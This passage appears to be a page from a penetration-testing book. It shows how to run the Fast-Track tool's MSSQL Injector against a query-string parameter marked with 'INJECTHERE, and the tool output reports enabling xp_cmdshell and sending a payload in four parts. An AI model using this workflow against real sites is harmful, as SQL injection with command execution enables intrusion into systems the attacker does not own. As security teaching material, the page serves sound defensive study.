Fast-Track
165
attacks by focusing on query string and POST parameters within web applica-
tions. The following attack relies on the attacker knowing that SQL injection
is present on the target website, and also knowing which parameter is vulner-
able. This attack will work only on MS SQL–based systems.
SQL Injector—Query String Attack
Begin the setup for the attack by selecting
Microsoft SQL Tools
from the main
menu and then
MSSQL Injector
, as shown below.
Pick a list of the tools from below:
1. MSSQL Injector
2. MSSQL Bruter
3. SQLPwnage
Enter your choice :
1
The simplest form of SQL injection is within the query string, typically
sent in the URL field from the browser to the server. This URL string can
often contain parameters that inform a dynamic site what information is
being requested. Fast-Track distinguishes which field to attack by inserting
an
'INJECTHERE
into the vulnerable query string parameter, like this:
http://www.secmaniac.com/index.asp?id='INJECTHERE&date=2011
When Fast-Track starts to exploit this vulnerability, it will look for the
id
string in all fields to determine which field to attack. Let’s look at this in
action by selecting the first option,
Query String Parameter Attack
.
Enter which SQL Injector you want to use
1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter Attack
3. SQL Injector - GET FTP Payload Attack
4. SQL Injector - GET Manual Setup Binary Payload Attack
Enter your choice:
1
. . . SNIP . . .
Enter the URL of the susceptible site, remember to put 'INJECTHERE for the
injectable parameter
Example:http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
Enter here:
http://www.secmaniac.com/index.asp?id='INJECTHERE&date=2011
Sending initial request to enable xp_cmdshell if disabled...
Sending first portion of payload (1/4)...
Sending second portion of payload (2/4)...
Sending third portion of payload (3/4)...
Sending the last portion of the payload (4/4)...